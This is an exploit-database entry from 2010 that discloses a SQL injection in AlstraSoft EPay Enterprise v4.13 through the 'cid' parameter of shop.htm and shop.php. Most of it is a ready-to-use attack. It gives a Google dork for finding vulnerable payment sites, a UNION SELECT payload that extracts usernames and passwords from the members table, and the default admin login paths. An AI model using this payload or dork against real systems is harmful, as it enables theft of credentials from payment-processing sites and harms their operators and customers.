EPay Enterprise v4.13 (cid) SQL Injection Vulnerability

2010-04-23T00:00:00
ID 1337DAY-ID-11953
Type zdt
Reporter v3n0m
Modified 2010-04-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =======================================================
EPay Enterprise v4.13 (cid) SQL Injection Vulnerability
=======================================================

-----------------------------------------------------------------------
        EPay Enterprise v4.13 (cid) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : April, 23-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
----------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : AlstraSoft EPay Enterprise
Vendor      : http://www.alstrasoft.com/
Price       : $240 USD
Google Dork : "Powered by EPay Enterprise" inurl:"shop.htm?cid=" inurl:"shop.php?cid="
Overview    :
 
EPay Enterprise has been developed by AlstraSoft with the growing demand
for online payment processing business similar to Paypal and Stormpay.com.
----------------------------------------------------------------
 
Exploit:
~~~~~~~
 
-99999+union+all+select+all+null,null,group_concat(username,char(58),password)v3n0m+from+dp_members--
 
SQLi p0c:
~~~~~~~
 
http://127.0.0.1/[path]/shop.htm?cid=[SQLi]
http://127.0.0.1/[path]/shop.php?cid=[SQLi]
 
 
Default Admin Login Page:
~~~~~~~~~~~~~~
http://127.0.0.1/[path]/admins/login.php
http://127.0.0.1/[path]/admins/login.htm
----------------------------------------------------------------
 


#  0day.today [2016-04-20]  #